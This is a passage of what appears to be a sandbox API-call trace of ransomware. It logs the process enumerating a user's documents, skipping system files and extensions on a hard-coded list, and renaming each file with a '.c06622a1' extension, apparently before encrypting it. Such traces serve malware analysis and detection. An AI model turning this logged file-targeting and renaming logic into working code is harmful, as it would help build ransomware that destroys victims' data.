HALPmcxz\\Documents\\oHjAL\\F8m820x7\\3jI XWvoc.odt.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\3ji xwvoc.odt.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0149.213] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.213] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0149.218] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xad05a7b [0149.218] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1b1443b7 [0149.218] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3451880f [0149.218] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xfbb0cdc [0149.218] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a848723 [0149.218] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ef095e1 [0149.218] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x634f3be1 [0149.218] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x689716a5 [0149.221] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x570fc44a [0149.221] RtlComputeCrc32 (PartialCrc=0xc44a, Buffer=0x4700094, Length=0x80) returned 0xf7139dc8 [0149.221] RtlComputeCrc32 (PartialCrc=0x9dc8, Buffer=0x4700094, Length=0x80) returned 0x573cb057 [0149.221] RtlComputeCrc32 (PartialCrc=0xb057, Buffer=0x4700094, Length=0x80) returned 0x48279712 [0149.222] RtlComputeCrc32 (PartialCrc=0x9712, Buffer=0x4700094, Length=0x80) returned 0xa174f492 [0149.222] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0149.222] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.222] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.222] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2646ac20, ftCreationTime.dwHighDateTime=0x1d5e3b1, ftLastAccessTime.dwLowDateTime=0x815e26e0, ftLastAccessTime.dwHighDateTime=0x1d5e3b3, ftLastWriteTime.dwLowDateTime=0x815e26e0, ftLastWriteTime.dwHighDateTime=0x1d5e3b3, nFileSizeHigh=0x0, nFileSizeLow=0x25b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="6kRuNR26Q0ncnu.xls", cAlternateFileName="6KRUNR~1.XLS")) returned 1 [0149.222] _wcsicmp (_Str1="6kRuNR26Q0ncnu.xls", _Str2="README.c06622a1.TXT") returned -60 [0149.222] wcsstr (_Str="6kRuNR26Q0ncnu.xls", _SubStr="README") returned 0x0 [0149.222] _wcsicmp (_Str1="autorun.inf", _Str2="6kRuNR26Q0ncnu.xls") returned 43 [0149.222] wcslen (_String="autorun.inf") returned 0xb [0149.222] _wcsicmp (_Str1="boot.ini", _Str2="6kRuNR26Q0ncnu.xls") returned 44 [0149.222] wcslen (_String="boot.ini") returned 0x8 [0149.222] _wcsicmp (_Str1="bootfont.bin", _Str2="6kRuNR26Q0ncnu.xls") returned 44 [0149.222] wcslen (_String="bootfont.bin") returned 0xc [0149.222] _wcsicmp (_Str1="bootsect.bak", _Str2="6kRuNR26Q0ncnu.xls") returned 44 [0149.222] wcslen (_String="bootsect.bak") returned 0xc [0149.222] _wcsicmp (_Str1="desktop.ini", _Str2="6kRuNR26Q0ncnu.xls") returned 46 [0149.222] wcslen (_String="desktop.ini") returned 0xb [0149.222] _wcsicmp (_Str1="iconcache.db", _Str2="6kRuNR26Q0ncnu.xls") returned 51 [0149.222] wcslen (_String="iconcache.db") returned 0xc [0149.222] _wcsicmp (_Str1="ntldr", _Str2="6kRuNR26Q0ncnu.xls") returned 56 [0149.222] wcslen (_String="ntldr") returned 0x5 [0149.222] _wcsicmp (_Str1="ntuser.dat", _Str2="6kRuNR26Q0ncnu.xls") returned 56 [0149.222] wcslen (_String="ntuser.dat") returned 0xa [0149.222] _wcsicmp (_Str1="ntuser.dat.log", _Str2="6kRuNR26Q0ncnu.xls") returned 56 [0149.222] wcslen (_String="ntuser.dat.log") returned 0xe [0149.222] _wcsicmp (_Str1="ntuser.ini", _Str2="6kRuNR26Q0ncnu.xls") returned 56 [0149.222] wcslen (_String="ntuser.ini") returned 0xa [0149.222] _wcsicmp (_Str1="thumbs.db", _Str2="6kRuNR26Q0ncnu.xls") returned 62 [0149.222] wcslen (_String="thumbs.db") returned 0x9 [0149.222] _wcsicmp (_Str1="386", _Str2="xls") returned -69 [0149.222] wcslen (_String="386") returned 0x3 [0149.222] _wcsicmp (_Str1="adv", _Str2="xls") returned -23 [0149.223] wcslen (_String="adv") returned 0x3 [0149.223] _wcsicmp (_Str1="ani", _Str2="xls") returned -23 [0149.223] wcslen (_String="ani") returned 0x3 [0149.223] _wcsicmp (_Str1="bat", _Str2="xls") returned -22 [0149.223] wcslen (_String="bat") returned 0x3 [0149.223] _wcsicmp (_Str1="bin", _Str2="xls") returned -22 [0149.223] wcslen (_String="bin") returned 0x3 [0149.223] _wcsicmp (_Str1="cab", _Str2="xls") returned -21 [0149.223] wcslen (_String="cab") returned 0x3 [0149.223] _wcsicmp (_Str1="cmd", _Str2="xls") returned -21 [0149.223] wcslen (_String="cmd") returned 0x3 [0149.223] _wcsicmp (_Str1="com", _Str2="xls") returned -21 [0149.223] wcslen (_String="com") returned 0x3 [0149.223] _wcsicmp (_Str1="cpl", _Str2="xls") returned -21 [0149.223] wcslen (_String="cpl") returned 0x3 [0149.223] _wcsicmp (_Str1="cur", _Str2="xls") returned -21 [0149.223] wcslen (_String="cur") returned 0x3 [0149.223] _wcsicmp (_Str1="deskthemepack", _Str2="xls") returned -20 [0149.223] wcslen (_String="deskthemepack") returned 0xd [0149.223] _wcsicmp (_Str1="diagcab", _Str2="xls") returned -20 [0149.223] wcslen (_String="diagcab") returned 0x7 [0149.223] _wcsicmp (_Str1="diagcfg", _Str2="xls") returned -20 [0149.223] wcslen (_String="diagcfg") returned 0x7 [0149.223] _wcsicmp (_Str1="diagpkg", _Str2="xls") returned -20 [0149.223] wcslen (_String="diagpkg") returned 0x7 [0149.223] _wcsicmp (_Str1="dll", _Str2="xls") returned -20 [0149.223] wcslen (_String="dll") returned 0x3 [0149.223] _wcsicmp (_Str1="drv", _Str2="xls") returned -20 [0149.223] wcslen (_String="drv") returned 0x3 [0149.223] _wcsicmp (_Str1="exe", _Str2="xls") returned -19 [0149.223] wcslen (_String="exe") returned 0x3 [0149.223] _wcsicmp (_Str1="hlp", _Str2="xls") returned -16 [0149.223] wcslen (_String="hlp") returned 0x3 [0149.223] _wcsicmp (_Str1="icl", _Str2="xls") returned -15 [0149.223] wcslen (_String="icl") returned 0x3 [0149.223] _wcsicmp (_Str1="icns", _Str2="xls") returned -15 [0149.223] wcslen (_String="icns") returned 0x4 [0149.223] _wcsicmp (_Str1="ico", _Str2="xls") returned -15 [0149.223] wcslen (_String="ico") returned 0x3 [0149.224] _wcsicmp (_Str1="ics", _Str2="xls") returned -15 [0149.224] wcslen (_String="ics") returned 0x3 [0149.224] _wcsicmp (_Str1="idx", _Str2="xls") returned -15 [0149.224] wcslen (_String="idx") returned 0x3 [0149.224] _wcsicmp (_Str1="ldf", _Str2="xls") returned -12 [0149.224] wcslen (_String="ldf") returned 0x3 [0149.224] _wcsicmp (_Str1="lnk", _Str2="xls") returned -12 [0149.224] wcslen (_String="lnk") returned 0x3 [0149.224] _wcsicmp (_Str1="mod", _Str2="xls") returned -11 [0149.224] wcslen (_String="mod") returned 0x3 [0149.224] _wcsicmp (_Str1="mpa", _Str2="xls") returned -11 [0149.224] wcslen (_String="mpa") returned 0x3 [0149.224] _wcsicmp (_Str1="msc", _Str2="xls") returned -11 [0149.224] wcslen (_String="msc") returned 0x3 [0149.224] _wcsicmp (_Str1="msp", _Str2="xls") returned -11 [0149.224] wcslen (_String="msp") returned 0x3 [0149.224] _wcsicmp (_Str1="msstyles", _Str2="xls") returned -11 [0149.224] wcslen (_String="msstyles") returned 0x8 [0149.224] _wcsicmp (_Str1="msu", _Str2="xls") returned -11 [0149.224] wcslen (_String="msu") returned 0x3 [0149.224] _wcsicmp (_Str1="nls", _Str2="xls") returned -10 [0149.224] wcslen (_String="nls") returned 0x3 [0149.224] _wcsicmp (_Str1="nomedia", _Str2="xls") returned -10 [0149.224] wcslen (_String="nomedia") returned 0x7 [0149.224] _wcsicmp (_Str1="ocx", _Str2="xls") returned -9 [0149.224] wcslen (_String="ocx") returned 0x3 [0149.224] _wcsicmp (_Str1="prf", _Str2="xls") returned -8 [0149.224] wcslen (_String="prf") returned 0x3 [0149.224] _wcsicmp (_Str1="ps1", _Str2="xls") returned -8 [0149.224] wcslen (_String="ps1") returned 0x3 [0149.224] _wcsicmp (_Str1="rom", _Str2="xls") returned -6 [0149.224] wcslen (_String="rom") returned 0x3 [0149.224] _wcsicmp (_Str1="rtp", _Str2="xls") returned -6 [0149.224] wcslen (_String="rtp") returned 0x3 [0149.224] _wcsicmp (_Str1="scr", _Str2="xls") returned -5 [0149.224] wcslen (_String="scr") returned 0x3 [0149.224] _wcsicmp (_Str1="shs", _Str2="xls") returned -5 [0149.225] wcslen (_String="shs") returned 0x3 [0149.225] _wcsicmp (_Str1="spl", _Str2="xls") returned -5 [0149.225] wcslen (_String="spl") returned 0x3 [0149.225] _wcsicmp (_Str1="sys", _Str2="xls") returned -5 [0149.225] wcslen (_String="sys") returned 0x3 [0149.225] _wcsicmp (_Str1="theme", _Str2="xls") returned -4 [0149.225] wcslen (_String="theme") returned 0x5 [0149.225] _wcsicmp (_Str1="themepack", _Str2="xls") returned -4 [0149.225] wcslen (_String="themepack") returned 0x9 [0149.225] _wcsicmp (_Str1="wpx", _Str2="xls") returned -1 [0149.225] wcslen (_String="wpx") returned 0x3 [0149.225] _wcsicmp (_Str1="lock", _Str2="xls") returned -12 [0149.225] wcslen (_String="lock") returned 0x4 [0149.225] _wcsicmp (_Str1="key", _Str2="xls") returned -13 [0149.225] wcslen (_String="key") returned 0x3 [0149.225] _wcsicmp (_Str1="hta", _Str2="xls") returned -16 [0149.225] wcslen (_String="hta") returned 0x3 [0149.225] _wcsicmp (_Str1="msi", _Str2="xls") returned -11 [0149.225] wcslen (_String="msi") returned 0x3 [0149.225] _wcsicmp (_Str1="pdb", _Str2="xls") returned -8 [0149.225] wcslen (_String="pdb") returned 0x3 [0149.225] _wcsicmp (_Str1="sql", _Str2="xls") returned -5 [0149.225] wcslen (_String="sql") returned 0x3 [0149.225] _wcsicmp (_Str1="sqlite", _Str2="xls") returned -5 [0149.225] wcslen (_String="sqlite") returned 0x6 [0149.225] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.225] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.225] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.225] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.225] wcscpy (in: _Dest=0x453011e, _Source="6kRuNR26Q0ncnu.xls" | out: _Dest="6kRuNR26Q0ncnu.xls") returned="6kRuNR26Q0ncnu.xls" [0149.225] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\6kRuNR26Q0ncnu.xls", dwFileAttributes=0x80) returned 1 [0149.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\6kRuNR26Q0ncnu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\6krunr26q0ncnu.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x650 [0149.226] SetFilePointerEx (in: hFile=0x650, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.226] ReadFile (in: hFile=0x650, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.227] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x1dee5a6d [0149.227] RtlComputeCrc32 (PartialCrc=0x5a6d, Buffer=0x3fe674, Length=0x80) returned 0xe33fed4f [0149.227] RtlComputeCrc32 (PartialCrc=0xed4f, Buffer=0x3fe674, Length=0x80) returned 0x40cbc571 [0149.227] RtlComputeCrc32 (PartialCrc=0xc571, Buffer=0x3fe674, Length=0x80) returned 0x2e1cff98 [0149.227] RtlComputeCrc32 (PartialCrc=0xff98, Buffer=0x3fe674, Length=0x80) returned 0x3655f821 [0149.227] CloseHandle (hObject=0x650) returned 1 [0149.227] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.227] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\6kRuNR26Q0ncnu.xls" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\6kRuNR26Q0ncnu.xls") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\6kRuNR26Q0ncnu.xls" [0149.227] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\6kRuNR26Q0ncnu.xls") returned 0x4d [0149.227] wcscpy (in: _Dest=0x454014a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.227] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\6kRuNR26Q0ncnu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\6krunr26q0ncnu.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\6kRuNR26Q0ncnu.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\6krunr26q0ncnu.xls.c06622a1"), dwFlags=0x8) returned 1 [0149.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\6kRuNR26Q0ncnu.xls.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\6krunr26q0ncnu.xls.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x650 [0149.230] CreateIoCompletionPort (FileHandle=0x650, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0149.230] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0149.235] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xecd65b4 [0149.235] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29be8813 [0149.235] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64d91849 [0149.235] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f38add8 [0149.235] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6b1825e8 [0149.235] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xaf66b77 [0149.235] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x131f33e [0149.235] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3bf4bbf1 [0149.238] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0xbf55b8b9 [0149.238] RtlComputeCrc32 (PartialCrc=0xb8b9, Buffer=0x4790094, Length=0x80) returned 0xa104105f [0149.238] RtlComputeCrc32 (PartialCrc=0x105f, Buffer=0x4790094, Length=0x80) returned 0x15aefd8 [0149.238] RtlComputeCrc32 (PartialCrc=0xefd8, Buffer=0x4790094, Length=0x80) returned 0x4c7e0f81 [0149.238] RtlComputeCrc32 (PartialCrc=0xf81, Buffer=0x4790094, Length=0x80) returned 0x1e9b5304 [0149.238] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0149.238] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.238] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.238] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb185ca0, ftCreationTime.dwHighDateTime=0x1d5e7a1, ftLastAccessTime.dwLowDateTime=0xeedd3570, ftLastAccessTime.dwHighDateTime=0x1d5e260, ftLastWriteTime.dwLowDateTime=0xeedd3570, ftLastWriteTime.dwHighDateTime=0x1d5e260, nFileSizeHigh=0x0, nFileSizeLow=0xbd55, dwReserved0=0x0, dwReserved1=0x0, cFileName="9mgTx3gVxoVOc7xRaj.pdf", cAlternateFileName="9MGTX3~1.PDF")) returned 1 [0149.238] _wcsicmp (_Str1="9mgTx3gVxoVOc7xRaj.pdf", _Str2="README.c06622a1.TXT") returned -57 [0149.238] wcsstr (_Str="9mgTx3gVxoVOc7xRaj.pdf", _SubStr="README") returned 0x0 [0149.239] _wcsicmp (_Str1="autorun.inf", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 40 [0149.239] wcslen (_String="autorun.inf") returned 0xb [0149.239] _wcsicmp (_Str1="boot.ini", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 41 [0149.239] wcslen (_String="boot.ini") returned 0x8 [0149.239] _wcsicmp (_Str1="bootfont.bin", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 41 [0149.239] wcslen (_String="bootfont.bin") returned 0xc [0149.239] _wcsicmp (_Str1="bootsect.bak", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 41 [0149.239] wcslen (_String="bootsect.bak") returned 0xc [0149.239] _wcsicmp (_Str1="desktop.ini", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 43 [0149.239] wcslen (_String="desktop.ini") returned 0xb [0149.239] _wcsicmp (_Str1="iconcache.db", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 48 [0149.239] wcslen (_String="iconcache.db") returned 0xc [0149.239] _wcsicmp (_Str1="ntldr", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 53 [0149.239] wcslen (_String="ntldr") returned 0x5 [0149.239] _wcsicmp (_Str1="ntuser.dat", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 53 [0149.239] wcslen (_String="ntuser.dat") returned 0xa [0149.239] _wcsicmp (_Str1="ntuser.dat.log", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 53 [0149.239] wcslen (_String="ntuser.dat.log") returned 0xe [0149.239] _wcsicmp (_Str1="ntuser.ini", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 53 [0149.239] wcslen (_String="ntuser.ini") returned 0xa [0149.239] _wcsicmp (_Str1="thumbs.db", _Str2="9mgTx3gVxoVOc7xRaj.pdf") returned 59 [0149.239] wcslen (_String="thumbs.db") returned 0x9 [0149.239] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0149.239] wcslen (_String="386") returned 0x3 [0149.239] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0149.239] wcslen (_String="adv") returned 0x3 [0149.239] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0149.239] wcslen (_String="ani") returned 0x3 [0149.239] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0149.239] wcslen (_String="bat") returned 0x3 [0149.239] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0149.239] wcslen (_String="bin") returned 0x3 [0149.239] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0149.239] wcslen (_String="cab") returned 0x3 [0149.239] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0149.239] wcslen (_String="cmd") returned 0x3 [0149.239] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0149.240] wcslen (_String="com") returned 0x3 [0149.240] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0149.240] wcslen (_String="cpl") returned 0x3 [0149.240] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0149.240] wcslen (_String="cur") returned 0x3 [0149.240] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0149.240] wcslen (_String="deskthemepack") returned 0xd [0149.240] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0149.240] wcslen (_String="diagcab") returned 0x7 [0149.240] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0149.240] wcslen (_String="diagcfg") returned 0x7 [0149.240] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0149.240] wcslen (_String="diagpkg") returned 0x7 [0149.240] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0149.240] wcslen (_String="dll") returned 0x3 [0149.240] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0149.240] wcslen (_String="drv") returned 0x3 [0149.240] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0149.240] wcslen (_String="exe") returned 0x3 [0149.240] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0149.240] wcslen (_String="hlp") returned 0x3 [0149.240] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0149.240] wcslen (_String="icl") returned 0x3 [0149.240] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0149.240] wcslen (_String="icns") returned 0x4 [0149.240] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0149.240] wcslen (_String="ico") returned 0x3 [0149.240] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0149.240] wcslen (_String="ics") returned 0x3 [0149.240] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0149.240] wcslen (_String="idx") returned 0x3 [0149.240] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0149.240] wcslen (_String="ldf") returned 0x3 [0149.240] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0149.240] wcslen (_String="lnk") returned 0x3 [0149.240] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0149.240] wcslen (_String="mod") returned 0x3 [0149.241] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0149.241] wcslen (_String="mpa") returned 0x3 [0149.241] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0149.241] wcslen (_String="msc") returned 0x3 [0149.241] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0149.241] wcslen (_String="msp") returned 0x3 [0149.241] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0149.241] wcslen (_String="msstyles") returned 0x8 [0149.241] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0149.241] wcslen (_String="msu") returned 0x3 [0149.241] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0149.241] wcslen (_String="nls") returned 0x3 [0149.241] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0149.241] wcslen (_String="nomedia") returned 0x7 [0149.241] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0149.241] wcslen (_String="ocx") returned 0x3 [0149.241] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0149.241] wcslen (_String="prf") returned 0x3 [0149.241] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0149.241] wcslen (_String="ps1") returned 0x3 [0149.241] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0149.241] wcslen (_String="rom") returned 0x3 [0149.241] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0149.241] wcslen (_String="rtp") returned 0x3 [0149.241] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0149.241] wcslen (_String="scr") returned 0x3 [0149.241] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0149.241] wcslen (_String="shs") returned 0x3 [0149.241] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0149.241] wcslen (_String="spl") returned 0x3 [0149.241] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0149.241] wcslen (_String="sys") returned 0x3 [0149.241] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0149.241] wcslen (_String="theme") returned 0x5 [0149.241] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0149.241] wcslen (_String="themepack") returned 0x9 [0149.241] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0149.241] wcslen (_String="wpx") returned 0x3 [0149.242] _wcsicmp (_Str1="lock", _Str2="pdf") returned -4 [0149.242] wcslen (_String="lock") returned 0x4 [0149.242] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0149.242] wcslen (_String="key") returned 0x3 [0149.242] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0149.242] wcslen (_String="hta") returned 0x3 [0149.242] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0149.242] wcslen (_String="msi") returned 0x3 [0149.242] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0149.242] wcslen (_String="pdb") returned 0x3 [0149.242] _wcsicmp (_Str1="sql", _Str2="pdf") returned 3 [0149.242] wcslen (_String="sql") returned 0x3 [0149.242] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0149.242] wcslen (_String="sqlite") returned 0x6 [0149.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7")) returned 0x10 [0149.242] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.242] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7" [0149.242] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7") returned 0x3a [0149.242] wcscpy (in: _Dest=0x453011e, _Source="9mgTx3gVxoVOc7xRaj.pdf" | out: _Dest="9mgTx3gVxoVOc7xRaj.pdf") returned="9mgTx3gVxoVOc7xRaj.pdf" [0149.242] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\9mgTx3gVxoVOc7xRaj.pdf", dwFileAttributes=0x80) returned 1 [0149.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\F8m820x7\\9mgTx3gVxoVOc7xRaj.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\f8m820x7\\9mgtx3gvxovoc7xraj.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0149.243] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.243] 